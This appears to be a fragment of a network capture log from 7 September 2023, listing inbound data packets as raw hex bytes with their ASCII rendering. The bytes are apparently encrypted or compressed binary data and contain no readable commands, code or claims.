2023-09-07 07:31:08 UTC	325	IN	Data Raw: d4 dd c0 4e 75 f1 f5 b7 98 ef c4 3a de 8a 89 15 c0 da ae 61 ef fd 4b 92 b4 6a ba a2 30 59 87 86 f5 59 9b 41 e0 fb 4d c0 ae 77 4c 96 49 75 44 fc ec 03 fe 37 fa 03 64 c1 3a a1 7b 0b fa 01 f1 99 1c 2d 2f 7d f6 2e 63 0b 31 8c 18 21 94 8c e2 8c 84 c1 2e e9 da 0d da 9c f8 76 08 ef aa ca 88 e5 bc 88 3d d5 01 3a 48 6e cb 0e 52 50 09 d8 86 5a 4d 74 c8 7b c9 f7 4e dc 51 73 a0 8c 74 ee 4e ca d1 f0 59 a6 00 7d f0 52 24 46 1e c6 99 ff 5f 92 11 df ec 0b 1c e6 ff 11 77 ad 18 8c 93 14 41 2a 1d a9 05 a2 e3 85 03 40 bb f0 a7 38 9a 8c 83 55 0d c8 ae 1f da 9d ea 40 62 6c 40 05 e6 fa 61 3a d0 4d 08 49 84 3d fe 0f 99 31 ab ed 5c 63 06 37 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 78 e0 aa 28 8b 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 68 8f Data Ascii: Nu:aKj0YYAMwLIuD7d:{-/}.c1!.v=:HnRPZMt{NQstNY}R$F_wA*@8U@bl@a:MI=1\c7cDeJsNyE/Tx(uAj^Dd-h
2023-09-07 07:31:08 UTC	326	IN	Data Raw: 69 a7 26 2f 2d e7 d4 85 ae 91 23 76 bf 32 7e 06 ca 24 a8 1f db 3a ac ee 97 3c 2f 47 74 18 a0 4b 17 b8 90 81 16 15 13 ee e8 90 dc 75 b0 c4 34 1a 5d f0 a8 1c 5c c2 59 a5 a6 3c db ab 73 c5 f2 fc c6 a2 94 a0 81 22 4c 85 42 79 98 13 ff 54 03 58 c5 34 38 32 06 52 22 44 fb 51 ea 3d cc 3e 41 01 00 e7 43 6b bd 9e 70 68 4f 2f 38 a6 ed 19 cb 09 c8 3c fc 1f cf b1 89 f3 13 3f 8d 0b 9c 32 10 b9 a9 ed b7 7c d8 86 52 59 ef 73 17 17 43 8f 96 b0 f5 cb f5 a1 de 5c f4 01 bb 0a f4 f7 c3 82 30 8a eb d3 2a e0 b3 9c db 48 6c 3e b8 6a b6 7f b4 bc ff ac 9c 80 62 c8 1e 54 62 cf 7e 81 b6 73 d9 54 20 b2 de 4c 89 43 8f 1c 96 86 ad eb 58 69 5c bb 15 9f ac 7f e7 4b 84 54 ad 26 6e a7 2a 80 e7 31 f8 93 1b 4f da 6b d6 a6 b7 5e be b4 26 c1 88 b9 95 11 f7 47 2d fc 9f 42 f5 91 04 fe f6 1b 13 Data Ascii: i&/-#v2~$:</GtKu4]\Y<s"LByTX482R"DQ=>ACkphO/8<?2\|RYsC\0Hl>jbTb~sT LCXi\KT&n1Ok^&G-B
2023-09-07 07:31:08 UTC	328	IN	Data Raw: 8d c7 41 aa ab 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 a3 62 ea 70 dc da f4 de e2 ac 96 57 db 48 71 a0 74 7e 6d 0c 0d ac 44 93 c7 a8 72 ef b8 62 96 8c e0 30 7b 14 7b 5f 90 19 6e 87 60 83 b2 4b d9 66 1d 84 45 b3 08 07 38 08 c1 bf cb f4 a2 33 94 2d 62 66 f4 b8 6e 8a af c8 63 e3 c5 a4 c3 4e 2f 59 f4 ad 14 1a 62 39 48 e2 3f 3a 08 11 e2 ab 30 6e 15 3d 06 43 c2 72 66 52 fa 9a 73 d9 b7 bf b0 f3 6f f9 18 c1 53 24 ff 92 4f 17 03 bd f5 ae 5f 81 5e 3b 55 6b 60 aa d8 07 50 0b 2e 92 b3 0e 31 dd 66 0c 3a f9 7a b0 22 41 45 58 09 3b c2 7e dd 24 00 21 ae e6 b2 7b f9 9f d2 0e ae ea 33 f5 37 cb f8 5b 9d 14 5c e3 cf 69 01 a3 16 29 21 ad f1 cc f3 92 c3 5d ba 64 7c e1 f3 3e 09 6f 64 87 45 3a 04 5f 1a b5 8c 71 56 94 35 ab 0f 37 9b 73 1f c4 88 a7 c6 73 52 50 b1 41 Data Ascii: AM0[",fbpWHqt~mDrb0{{_n`KfE83-bfncN/Yb9H?:0n=CrfRsoS$O_^;Uk`P.1f:z"AEX;~$!{37[\i)!]d\|>odE:_qV57ssRPA
2023-09-07 07:31:08 UTC	329	IN	Data Raw: cf 10 32 3a 19 5b 02 bd fa 08 65 e9 6e 61 7c ce 8a de c5 7b d7 c4 cb 01 83 a9 7f 90 ac 85 88 b9 8d fa de 9a bd db 9c 04 96 23 63 0c ac d1 09 38 7f bf bf 05 2a d4 e4 c4 f7 57 36 52 ec b2 0c e5 e9 e8 19 aa 5e ac da 35 2a 27 5a 6a d5 f8 5f e6 08 bd 25 3d aa 43 38 26 48 ad af f4 b3 d6 b7 d0 50 92 ca a8 01 f4 c3 73 b0 94 80 97 e7 7c 23 75 69 0c 8f 07 16 07 d7 78 e6 62 ce a3 37 ae bf 51 55 52 8c ce 53 8b fd 0f aa 52 d8 f9 84 4e 6a b0 ed 3c a5 4c 4a 1e 71 3f 09 6a 15 53 97 d1 e6 e7 00 12 ac a2 a2 35 14 f3 02 00 33 75 a4 36 7d 40 b5 1c 0f e2 1c b3 96 c0 fa ab e3 3d 21 b4 3f 14 c1 0c 00 9e f1 d9 5e 9d a3 ba 33 36 4a 38 af fe 45 a2 1e 5b 68 90 1d d7 53 2e 92 8b 41 e9 e3 39 77 3a fd c8 18 28 20 1c c2 91 b4 16 39 53 0e 6e 5d 55 0b 33 16 f3 78 56 e6 e6 ea c4 cb 2d 39 Data Ascii: 2:[ena\|{#c8W6R^5'Zj_%=C8&HPs\|#uixb7QURSRNj<LJq?jS53u6}@=!?^36J8E[hS.A9w:( 9Sn]U3xV-9
2023-09-07 07:31:08 UTC	330	IN	Data Raw: 66 64 60 03 fd 40 95 79 e1 62 a1 59 bc 54 1a 1d 0e 69 23 3a de dc ee 55 5b 61 11 53 2f f1 91 81 e2 00 88 5c 5d ce 0d 34 05 c4 3a bc 78 bd fa fd bb 05 11 eb 21 bf 98 02 75 28 e4 c2 6e 00 fe bc 13 d2 43 9c f6 a6 29 c6 53 bb dc ac 61 bb c1 4e 81 2c e9 d2 8f d2 57 3f 94 c7 4e ec b8 ca 19 60 13 79 f8 d2 c1 83 ad ff 54 0c 12 66 6b 0b 2f 62 6a fa 86 ad 8b 96 1e 6c c9 d5 7d 4f 2e c6 bc 01 d5 44 0b e4 42 df 40 92 5b 8b bc 16 25 69 42 99 8e e4 50 1f 22 04 7c d3 0c 94 17 58 ae 50 07 db 27 9d 85 67 aa e9 1b f7 fd 0c 47 35 cc 30 74 ce 43 4b a1 b9 1b 9b 70 1c 4a f0 58 20 f1 0d f1 36 59 4c c1 fe 20 af 73 45 20 d1 91 10 00 93 f5 fd dc 88 d0 f6 35 87 43 c3 cd 19 8c a7 1a 50 7c 87 f6 f0 bb 6d f4 2b e7 0d ee b1 c9 96 38 ec 1d bf 81 fa 3a c5 4b 0c 1b 07 17 1d c4 a7 4d 24 a4 Data Ascii: fd`@ybYTi#:U[aS/\]4:x!u(nC)SaN,W?N`yTfk/bjl}O.DB@[%iBP"\|XP'gG50tCKpJX 6YL sE 5CP\|m+8:KM$
2023-09-07 07:31:08 UTC	331	IN	Data Raw: be 28 78 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b e4 e3 fb 10 d3 42 ae bc ec 52 3b 93 81 f0 1d b2 b9 17 6b 38 91 07 c8 be f6 46 58 bf be 71 e0 08 eb 13 5a 28 6d 0c 43 0b 3f a3 a6 6e ee 6d 11 bc 36 29 bf cc 85 c8 d6 ba 10 0b 0f 7e 24 26 34 6b 42 f6 42 d5 96 fb b0 d5 5d 3b d6 4e 90 71 3b 45 34 c3 99 7a 2c 3f 50 a9 0d 0a 6b 40 14 3b f4 e8 70 76 18 09 20 51 ac 26 07 b4 5f 82 90 45 af f9 a3 78 5a 2c a2 64 a6 fa 07 b2 ef 40 8a b3 60 bf 8b bb 01 ee fd 01 01 0f fd 9b 94 7d 51 84 5a 47 f1 0e a9 f3 d0 d0 82 09 d1 9c f4 31 73 e7 21 6b 73 1d 73 7b 3e d1 16 da f2 25 9c 07 89 f7 10 55 35 77 1a bc 77 c2 d5 7e c5 b7 91 34 f1 ad ae 09 27 79 5a 32 8b 37 84 36 08 b1 23 50 8e 5f 8b 43 18 b1 3d 26 05 a6 10 4a c9 0f ad c4 46 e1 c6 99 ff a0 Data Ascii: (xmAjvgO)a/D ,E+BR;k8FXqZ(mC?nm6)~$&4kBB];Nq;E4z,?Pk@;pv Q&_ExZ,d@`}QZG1s!kss{>%U5ww~4'yZ276#P_C=&JF
2023-09-07 07:31:08 UTC	332	IN	Data Raw: 45 3a 04 5f 1a b5 8c 71 56 94 35 ab 0f 37 9d 75 16 c5 90 eb 87 7b 4a 84 4f 53 d1 95 ae bd ef 21 87 52 ad 54 59 a6 a4 a1 50 d6 2a 00 7b fc 0e bf 7e 3c aa 88 53 06 49 94 2e 95 f1 bf 60 c8 09 7c da f8 84 38 ad c9 f3 e5 9f ff 99 48 e3 1c 80 67 e4 55 95 3a 32 7a d7 97 d4 11 97 c8 3f fe 25 4a cf 4e ae 77 da 5a 5f ae ac 76 d2 15 d8 01 c3 16 55 e6 26 17 11 a6 d4 bd 92 d0 23 4e 83 73 7e 3e f6 65 a8 26 e6 7a ac d3 ae 7b 2f 7a 4d 5f a0 3b 63 b0 90 46 d5 ab 13 29 2b 2e dc b2 73 7a 40 af ec 5d 57 66 24 b6 a6 b9 ba 27 24 ab 73 c5 0d fc c6 a2 6b a0 81 22 b5 85 42 79 c4 13 ff 54 03 58 c5 34 38 32 06 52 22 44 fb 51 ea 3d cc 3e 41 01 00 e7 43 6b bd 9e 70 68 4f 2f b3 a6 ed 19 34 09 c8 3c 03 a7 78 06 76 08 e9 c6 72 f0 66 c8 ef 47 57 13 48 83 27 79 ad a6 10 8c e8 e8 bc 70 69 Data Ascii: E:_qV57u{JOS!RTYP*{~<SI.`\|8HgU:2z?%JNwZ_vU&#Ns~>e&z{/zM_;cF)+.sz@]Wf$'$sk"ByTX482R"DQ=>ACkphO/4<xvrfGWH'ypi
2023-09-07 07:31:08 UTC	334	IN	Data Raw: d7 55 e3 3c 6f b5 e8 c6 ac 0e 3e 0d 07 0a 22 04 e7 78 46 f7 f5 eb c6 c9 2f 39 13 cb 01 05 54 d0 21 9e e7 c8 2d 85 ec 0c 25 be 79 6b 2c 3c c3 6b 91 ba 4c 0f c3 b7 2e 6d d4 e9 6d fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b ff fc 54 2b 7c e3 1d 6f 23 e6 9e 0c 02 fc 1f 98 0f 67 f5 11 2c 6b fd 9e 57 49 8d c7 41 aa ab 4d 3a c3 c6 a6 79 30 b0 ab a4 2c 9a a6 d3 9a 4e 1f 6b 5f 9e 16 8f 22 24 09 21 1d 52 68 a8 24 b6 8f 5f 8b 80 93 8c f2 52 ba 93 38 56 8c ef df 0a fc 8c f8 2a 65 14 63 45 8f 19 68 81 69 83 b2 4a d8 66 1d 85 44 b3 08 06 39 08 c1 be ca f4 a2 32 95 2d 62 67 f5 b8 6e 8b ae c8 63 e2 c4 a4 c3 4f 2e 59 f4 ac 15 1a 62 38 49 e2 21 1b 0c 11 5c 65 21 6e ba 83 16 43 cc 7d 65 52 de bd 77 d9 79 5f a2 f3 47 d5 1d c1 53 25 fe 92 Data Ascii: U<o>"xF/9T!-%yk,<kL.mmfNq <Ebb>vcx+T+\|o#g,kWIAM:y0,Nk_"$!Rh$_R8V*ecEhiJfD92-bgncO.Yb8I!\e!nC}eRwy_GS%
2023-09-07 07:31:08 UTC	335	IN	Data Raw: d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 73 e8 e2 3b a7 b2 db 5b 0c de 92 d6 02 cf 88 54 16 97 c4 a9 6c 39 f2 34 62 f7 96 70 ce c9 cf b6 f2 ab e0 f2 c4 45 58 cc e1 f7 c5 37 54 0a 47 ce 60 5b 44 39 fe e7 b8 9f 9b 98 e9 0c 15 18 57 fa ec 88 4c d5 66 c8 46 ef f6 ff b9 65 3c c7 cf 4f e9 f8 de f5 7b a7 c3 59 63 f1 6e 45 9f e6 ce 11 32 3b 18 5a 02 bc fb 09 65 e8 6f 60 7c cf 8b df c5 7a d6 c5 cb 22 a5 ad 7f 59 76 97 88 15 37 f5 de 9b bc da 9c 05 97 22 63 0d ad d0 09 39 7e be bf 04 2b d5 e4 c5 f6 56 36 53 ed b3 0c e4 e8 e9 19 ab 5f ad da 34 2b 26 5a 6b d4 f9 5f e7 09 bc 25 3c ab 42 38 27 49 ac af f5 b2 d7 b7 d1 51 93 ca a9 00 f5 c3 72 b1 95 80 95 e5 7e 23 77 6b 0e 8f 04 15 04 d7 33 af 26 ce 40 d6 52 bf ad ae ac 8c 31 ac 74 89 f0 55 ad 27 06 7b b1 95 Data Ascii: N6i@~:s;[Tl94bpEX7TG`[D9WLfFe<O{YcnE2;Zeo`\|z"Yv7"c9~+V6S_4+&Zk_%<B8'IQr~#wk3&@R1tU'{
2023-09-07 07:31:08 UTC	336	IN	Data Raw: 0a b3 22 52 8f 5c 8d 49 13 b3 35 2d 0c a5 5b 02 80 0d 52 38 ba e2 38 64 02 a2 6a 13 22 11 0b 10 1a 03 ef 8a 50 e5 7c a9 d4 b9 2b d9 8e e8 5d 8c e6 f1 81 82 32 5f ef 66 70 7f e3 f0 35 53 70 26 61 16 bf 9f b1 bd fa 1b 07 9c a5 78 b1 f4 b7 79 c0 03 f0 65 cd 57 13 a1 9e fb c8 9f 7d b8 9b b7 8e b3 18 85 f2 30 bb d2 f5 a9 87 1d 57 d5 74 89 bd 75 61 82 70 4e 95 72 eb 60 a0 5d b9 57 1a 23 4e 6d 22 de 35 97 ee 16 68 8f 10 9d e5 0b 91 7e 1d ff fc a3 a2 31 f2 cb fa 3b c5 41 85 40 05 0e 49 f5 ee 18 d3 4f 67 b0 c4 98 1b c2 6e 00 01 bc 13 d2 bc 9c f6 a6 a2 c6 53 bb dc ac 61 bb c1 4e 81 2c e9 d2 8f d2 57 3f 94 c7 4e ec b8 ca 92 60 13 79 07 d2 c1 83 52 45 ee b6 ed 98 95 f5 d0 9c 94 04 79 50 76 6a e1 91 34 28 82 b2 d3 3a 43 fc 28 b9 7f 19 bf 22 40 6f a6 77 bc 58 6a 24 42 Data Ascii: "R\I5-[R88dj"P\|+]2_fp5Sp&axyeW}0WtuapNr`]W#Nm"5h~1;A@IOgnSaN,W?N`yREyPvj4(:C("@owXj$B
2023-09-07 07:31:08 UTC	337	IN	Data Raw: 4a 72 0d ef c3 76 f4 60 ce eb 46 52 16 4c 82 24 7a a9 a6 13 8f ec e9 bd 71 68 4f 0b 35 2a 5f 64 e6 bc fe bb 0a 0b 09 c3 82 ce 22 bd 87 d5 b8 7c 56 25 96 b6 eb 47 b4 6c aa 4a 62 25 79 63 5e b8 1d e1 8a b8 1a 80 5f 6c a6 26 8a fa 67 20 92 53 96 70 c2 4c 53 53 35 82 bc a3 65 cf 4a 52 a1 3d 9e 7b 8a 77 f3 91 79 f0 55 19 64 22 46 e4 6e 00 be 28 87 d7 31 fb 95 03 eb 89 98 b1 3a f6 66 0b d2 9a 63 d3 bf 00 df d0 35 17 ba 12 d0 1f 97 07 eb 28 42 52 47 17 52 72 dd ce f0 16 be b7 17 6f 34 9c 07 ca bb f0 46 5b bb ba 71 e3 0c ef 13 59 2c 69 0c 40 0f 3b a3 a5 6a ea 6d 12 b8 32 29 bc c8 81 c8 d5 be 14 0b 0c 7a 20 26 37 6f 46 f6 41 d1 92 fb b2 d0 59 3b 9e Data Ascii: Jrv`FRL$zqhO5*_d"\|V%GlJb%yc^_l&g SpLSS5eJR={wyUd"Fn(1:fc5(BRGRro4F[qY,i@;jm2)z &7oFAY;
2023-09-07 07:31:08 UTC	338	IN	Data Raw: 1b 93 71 f5 9e 22 c3 3a d0 26 3f 72 8e 0a 0a 04 34 19 3b 60 6d 65 76 2f 39 20 51 be 32 05 b4 6a bc 90 45 9e cb a2 78 7a 0e a2 64 bd e4 00 b2 fc 55 8c b3 6a b2 8e bb 00 e8 f8 01 0b 01 f8 9b 3d c1 5a 84 f7 fe fa 0e a5 e7 d6 d0 81 0d d5 9c f7 35 77 e7 22 6f 77 1d 70 7f 3a d1 15 de f6 25 9d 06 88 f7 10 55 35 77 5f f9 32 c2 2a 81 3a b7 6e cb 0e ad 51 f6 d8 0d a5 cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 b4 ee 4e ca d1 f0 59 a5 ff 7d f0 ad c4 46 1e c6 99 ff 5f 95 ee df ec f4 ec e6 be 11 77 ad 73 83 6c 14 2a d5 e1 a9 6e a2 e3 85 68 7f 44 f0 1b 10 9a 8c 7c 1d 0d c8 50 3c 68 2c 15 b4 96 be be f0 12 08 9e a8 75 a2 f6 bb 75 d2 01 fd 68 de 55 1e ae 93 f9 c4 91 71 bb 96 b8 83 b0 13 8b ff 33 b1 dc f9 aa 8c 13 58 d7 7e 86 b3 77 6a 8b 7e 4c 9f 7a e4 62 a8 55 b7 55 13 2b 47 6f Data Ascii: q":&?r4;`mev/9 Q2jExzdUj=Z5w"owp:%U5w_2:nQt{NssNY}F_wslnhD\|P<h,uuhUq3X~wj~LzbUU+Go
2023-09-07 07:31:08 UTC	339	IN	Data Raw: ad 77 d3 50 9d 44 c3 e9 aa 19 27 e8 ee 59 d4 42 6d 2f 57 b1 7c 8c 81 c1 09 9a 57 d8 18 84 53 29 54 82 d0 80 b7 a6 5f 8c d4 06 6f 46 d5 ab ec 29 2b 2e 23 b2 73 7a cb af ec 5d cc 66 24 b6 59 b9 ba 27 db ab 73 07 f2 fc c6 56 94 a0 81 d6 4a 85 42 8d 3b 13 ff a0 fc 58 c5 c0 c7 32 06 a6 dd 44 fb a5 15 3d cc ca be 01 00 13 bc 6b bd 6a 8f 68 4f db c7 a6 ed ed 34 09 c8 c8 03 1f cf 45 76 f3 13 cb 72 0b 9c c6 ef b9 a9 19 48 7c d8 72 ad 59 ef 87 e8 17 43 7b 69 b0 f5 3f 2b a1 de a8 f9 01 bb fe f4 f7 c3 76 31 dd bd 73 2a 33 7c a2 da 96 b6 1f b8 b4 6c 5e b5 62 25 8d 9c 28 cd ed 1e 7b 48 f7 7f ac 9e 56 d9 72 02 90 df 6b aa 6e 8f 3b b4 a4 ac cc 7b 44 5c 9c 37 bd ad 58 c4 66 84 73 8f 04 6e 80 09 ad e6 16 db be 1b 68 f8 49 d7 81 94 73 be 93 04 e3 89 9e b6 3c f7 60 0f de 9e Data Ascii: wPD'YBm/W\|WS)T_oF)+.#sz]f$Y'sVJB;X2D=kjhO4EvrH\|rYC{i?+v1s*3\|l^b%({HVrkn;{D\7XfsnhIs<`
2023-09-07 07:31:08 UTC	340	IN	Data Raw: 52 e1 d3 1e 88 79 a8 46 82 14 be aa ab 9d 4e 63 66 48 79 d0 50 52 a4 92 25 cc d3 66 b2 33 6b 88 49 32 8f 2f 29 08 21 48 06 66 a8 db 48 a1 5f b4 be 9e 8c c0 61 b2 93 d0 bf a7 ef 37 e3 d7 8c 10 c3 4e 14 9f b8 a0 19 97 7f 47 83 4d b4 f6 66 e2 7b 6a b3 f7 f8 17 08 4f 30 ed f4 b5 2b 88 2d 77 71 ee b8 64 81 a2 c8 6a e9 ce a4 ca 44 24 59 fd a7 1f 1a 6b 33 43 e2 36 30 03 11 eb a1 3b 6e 1c 37 0d 43 cb 78 6d 52 f3 90 78 d9 be b5 bb f3 66 f3 13 c1 5a 2e f4 92 46 1d 08 bd fc a4 54 81 57 31 5e 6b 69 a0 d3 07 59 01 25 92 ba 04 3a dd 6f 06 31 f9 72 b9 28 41 44 59 08 3b c2 7e dd 24 45 64 eb e6 4d 84 06 9f 2d f1 51 ea cc 0a c8 bf 07 a4 62 eb a3 1c 30 96 fe 5c e9 d6 de 52 0e 33 0c 6d 3c a2 45 9b 83 1e 0c c1 f6 90 9b 78 ba c5 fb a0 e5 4a 73 8e a9 f0 ca 54 f0 37 62 8b e8 c5 Data Ascii: RyFNcfHyPR%f3kI2/)!HfH_a7NGMf{jO0+-wqdjD$Yk3C60;n7CxmRxfZ.FTW1^kiY%:o1r(ADY;~$EdM-Qb0\R3m<ExJsT7b
2023-09-07 07:31:08 UTC	341	IN	Data Raw: d3 4b 62 fd 61 55 9f ea c1 01 33 37 17 4a 02 b0 f4 19 64 e4 60 70 7c c3 84 cf c4 76 d9 d5 cb 0c 8d b8 7f 9d a2 94 89 b4 83 eb de 97 b3 ca 9d 09 98 32 63 01 a2 c0 08 35 71 ae bf 08 24 c5 e5 c9 f9 46 36 5f e2 a3 0c e8 e7 f9 18 a7 50 bd da 39 27 28 5b 6b d4 f9 5f e7 09 bc 24 78 ef 06 38 d9 b7 52 ae 0b 4c 29 b7 2f af 6d be 57 fe 0b 3c 8c 4f 6b 7f 68 18 83 dc 8a 96 f3 70 f9 e8 f9 28 89 16 9f 31 40 d6 52 40 ad ae ac 73 31 ac 74 02 f0 55 ad bc 06 7b b1 6a 4d 11 c0 a5 a2 a6 75 71 d1 e5 20 15 c2 05 c1 e6 ba 5d d6 ac ff ff f1 14 87 76 cc 47 e5 34 e0 82 d0 25 ca f0 6c 92 66 69 b4 8e 67 1c 60 7c 70 c0 49 9c c8 ff e3 8c 16 a1 0d 33 6c cc a6 da ee 50 75 ce 76 e1 36 05 5a e2 8a 0e ea 6d d6 1c 2d 1c 64 2a fe 02 4c 9c fa 54 8c 52 47 b4 86 a9 85 0f 51 63 2f 0b 4c 6b ce 79 Data Ascii: KbaU37Jd`p\|v2c5q$F6_P9'([k_$x8RL)/mW<Okhp(1@R@s1tU{jMuq ]vG4%lfig`\|pI3lPuv6Zm-d*LTRGQc/Lky
2023-09-07 07:31:08 UTC	342	IN	Data Raw: 08 54 87 e0 aa 28 00 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 68 8f ee 9d e5 0b 6e 7e 1d ff 77 a3 a2 31 69 cb fa 3b 3a 41 85 40 fa 0e 49 d5 11 18 d3 67 98 b0 c4 b0 e4 c2 6e 28 fe bc 13 fa 43 1c 76 0f 5d 69 fc 63 23 02 cf 6c 3e ec 20 e4 16 73 2f 14 a8 9e 34 01 b1 4d 18 0c e6 c1 b3 bf 07 73 61 45 52 5e f4 ca ed c7 cb cd d0 c3 ca 3c 79 0c 2b 50 e1 cd 69 13 82 ee 8e 00 43 a0 75 82 7f 45 e2 19 40 33 fb 4d bc 04 37 1f 42 cc dd d3 50 4a 71 33 7c 8f 51 af 17 06 f1 69 07 84 79 a5 85 6f ab d8 1b 0e 12 37 47 78 ba 22 74 d9 56 50 a1 ad 0d 81 70 1a 4f e8 58 a1 45 1a f1 e5 97 47 c1 a6 64 b2 73 50 37 cb 91 04 16 89 f5 e9 ca 92 d0 e2 23 9d 43 d7 db 03 8c b3 0c 4a 7c 93 e0 ea bb 79 e2 31 e7 19 f8 ab c9 82 2e f6 1d ab 97 e0 3a d1 5d 16 1b Data Ascii: T(uAj^Dd-hn~w1i;:A@Ign(Cv]ic#l> s/4MsaER^<y+PiCuE@3M7BPJq3\|Qiyo7Gx"tVPpOXEGdsP7#CJ\|y1.:]
2023-09-07 07:31:08 UTC	344	IN	Data Raw: b5 c2 10 c1 a6 3f 6e e3 5e f3 86 8e 6b 9a 95 1f f4 ad 99 ac 24 d3 66 14 c9 ba 62 cc a4 20 df cf 2e 37 bb 0d cb 3f 97 18 f0 08 42 4d 5c 37 53 6d c6 ee f0 09 a5 97 16 70 2f bc 07 d5 a0 d0 47 44 a0 9a 71 fc 17 cf 12 46 37 49 0c 5f 14 1b a3 ba 71 ca 6c 0d a3 12 29 a3 d3 a1 c9 ca a5 34 0b 13 61 00 27 28 74 66 f6 5e ca b2 fa ad cb 79 3b 81 00 b3 70 ea 85 02 c3 25 cb 06 3f 6d 95 2a 0b 54 78 34 3b d9 c1 51 77 36 20 01 51 82 0f 26 b5 71 ab b1 45 81 d0 82 79 65 15 82 64 a2 ff 20 b2 e6 4a 97 b2 62 ba 84 bb 02 ed fd 00 08 05 fc 9b 2b d0 4b 85 18 16 12 0e 59 1c 2d d1 7d f6 2e 91 0b ce 8c 00 de 94 8c e2 8c 84 c1 2e e9 25 0d da 63 f8 76 08 ef aa ca 88 e5 43 88 3d 2a 81 3a 48 6e cb 0e 52 51 f6 d8 86 a5 cd 74 c8 7b c9 f7 4e dd ae 73 a0 73 b4 ee 4e ca d1 f0 59 a5 ff 7d f0 Data Ascii: ?n^k$fb .7?BM\7Smp/GDqF7I_ql)4a'(tf^y;p%?mTx4;Qw6 Q&qEyed Jb+KY-}..%cvC=:HnRQt{NssNY}
2023-09-07 07:31:08 UTC	345	IN	Data Raw: 83 1e f3 c1 f6 90 65 78 ba c5 04 a0 e5 4a 8d 8e a9 6b 35 54 f0 c8 9d 8b e8 3b 91 43 27 8c 4a b4 51 be d0 e4 cb 4f ef d6 70 ac ac ab a6 59 a4 5e af 29 2b ff 84 03 0e 40 81 c3 aa 77 ac f9 48 62 db 6b f1 fe 51 26 08 e9 56 0d 84 c7 52 36 f9 1a 60 00 06 b7 1c e3 7f 98 1b aa 6a c5 cd 85 28 68 2b ee 68 37 c0 01 da b5 30 b1 51 88 25 a5 a0 51 53 89 2d ea 27 fe 3c e9 aa 19 d9 e8 ee 59 2b 42 6d 2f dc b1 7c 8c 81 c1 09 9a 57 d8 18 84 53 29 54 82 d0 80 b7 a6 5f 8c d4 06 6f 46 d5 ab ec 29 2b 2e 23 b2 73 7a cb af ec 5d 78 66 24 b6 1a b9 ba 27 de ab 73 c5 f2 fc c6 a2 94 a0 81 22 4a 85 42 79 3b 13 ff 54 fc 58 c5 34 c7 32 06 52 dd 44 fb 51 15 3d cc 3e be 01 00 e7 bc 6b bd 9e 8f 68 4f 2f c7 a6 ed 19 34 09 c8 3c 03 1f cf b1 76 f3 13 3f 72 0b 9c 32 ef b9 a9 ed 48 7c d8 86 ad Data Ascii: exJk5T;C'JQOpY^)+@wHbkQ&VR6`j(h+h70Q%QS-'<Y+Bm/\|WS)T_oF)+.#sz]xf$'s"JBy;TX42RDQ=>khO/4<v?r2H\|
2023-09-07 07:31:08 UTC	346	IN	Data Raw: e9 e3 39 77 3a fd c8 67 28 ab 1c 02 91 4b 16 39 53 f0 c1 8c f9 f4 dc 3b 18 86 b9 08 0a 15 39 48 d1 c7 ed f4 fe fb ab 2e df 60 19 4b d1 7e 13 37 de 45 87 d3 94 84 3c 14 91 ba b2 cf c3 b7 d1 6d d4 e9 e6 83 89 66 03 3b ef 4e f7 71 20 3c 06 f9 45 1c 94 c9 aa 9b 62 62 3e 76 f9 1c 78 2b ff 3c 54 2b 7c e3 1d 6f 23 99 9e 0c 02 3c 1f 98 0f 67 f5 11 2c 14 fd 9e 57 89 8d c7 41 aa ab 4d b1 bc c6 a6 86 f0 b0 ab 5b 95 22 1e 2c 19 b2 e3 94 63 62 ea 70 dc da f4 de 9d ac 96 57 1b 48 71 a0 74 7e 6d 73 72 ac 44 6c 07 a8 72 10 20 f4 02 73 78 d4 9b eb 5c bb 71 e6 97 7f 97 7c 32 b4 26 99 22 7b ba 4c f7 f8 c7 f7 41 40 34 0b 9d cc 6b d2 9d 99 0b 47 ee 75 50 37 5c 1c 3a 5b 3c b1 d0 a6 74 52 eb e5 63 c6 b7 1d c0 c5 f7 ee 62 54 cf 91 15 c2 f9 bc 3d 8d 99 ad fa 65 8c 26 b7 40 4f 0c Data Ascii: 9w:g(K9S;9H.`K~7E<mf;Nq <Ebb>vx+<T+\|o#<g,WAM[",cbpWHqt~msrDlr sx\q\|2&"{LA@4kGuP7\:[<tRcbT=e&@O
2023-09-07 07:31:08 UTC	347	IN	Data Raw: 76 50 87 d4 d6 97 6d d6 0d cb 0d cc 97 e5 96 1a ca 31 bf a3 dc 16 c5 69 2a 37 07 35 3b e8 a7 6f 02 88 0c b9 f2 bc 02 ef ac 7a 16 b7 e0 87 6c 19 d6 1a 62 d4 b1 5d ce ea e8 9b f2 88 c7 df c4 66 7f e1 e1 d4 e2 1a 54 5e 1e 93 60 95 95 e9 fe 19 46 61 9b 66 17 f2 15 e6 a9 04 ab 76 b2 2b 99 36 b8 11 09 01 47 9b c3 39 31 b1 16 06 20 0b 84 59 3d a7 9c 0f 90 bb 60 18 30 ef cd c5 e6 a4 fd 42 05 f7 9a 16 91 9e 83 31 75 21 3a 84 28 3b 34 fe 7c 56 80 6f 53 7a 77 46 72 05 7c 65 42 24 9c fb 69 dc 63 b4 15 6a 09 1d 57 92 bf 1a 09 fc e4 db d4 7f 36 4d cf 9a 0c fa ca c0 19 b5 7d 84 da 2a 09 0f 5a 75 f6 d0 5f f9 2b 95 25 22 89 6b 38 39 6b 85 af eb 90 fe b7 cf 73 ba ca b7 22 dc c3 6c 93 bc 80 88 c4 54 23 6a 4a 24 8f 19 34 2e d7 69 ca 48 ce a0 0a 85 bf 4d 72 7b 8c d1 70 a3 fd Data Ascii: vPm1i75;ozlb]fT^`Fafv+6G91 Y=`0B1u!:(;4\|VoSzwFr\|eB$icjW6M}Zu_+%"k89ks"lT#jJ$4.iHMr{p
